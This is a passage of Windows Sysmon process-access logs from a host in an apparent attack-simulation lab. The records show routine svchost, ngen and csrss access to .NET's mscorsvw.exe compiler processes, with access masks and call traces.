{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7954,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.950\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-00106B480D00}\r\nTargetProcessId: 2880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.950","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-00106B480D00}","TargetProcessId":"2880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7955,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.981\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-001097E70C00}\r\nTargetProcessId: 3284\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.981","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-001097E70C00}","TargetProcessId":"3284","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7956,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.981\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-001097E70C00}\r\nTargetProcessId: 3284\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.981","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-001097E70C00}","TargetProcessId":"3284","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7957,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.997\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-0010284C0D00}\r\nTargetProcessId: 3284\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.997","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-0010284C0D00}","TargetProcessId":"3284","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7958,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:19.013\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-00107DEB0C00}\r\nTargetProcessId: 4988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:19.013","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-00107DEB0C00}","TargetProcessId":"4988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7959,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:19.013\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-00107DEB0C00}\r\nTargetProcessId: 4988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:19.013","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-00107DEB0C00}","TargetProcessId":"4988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7960,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:19.028\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133F-5F25-0000-00109A4F0D00}\r\nTargetProcessId: 4988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:19.028","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133F-5F25-0000-00109A4F0D00}","TargetProcessId":"4988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7961,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:19.059\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-00103FEF0C00}\r\nTargetProcessId: 3476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed 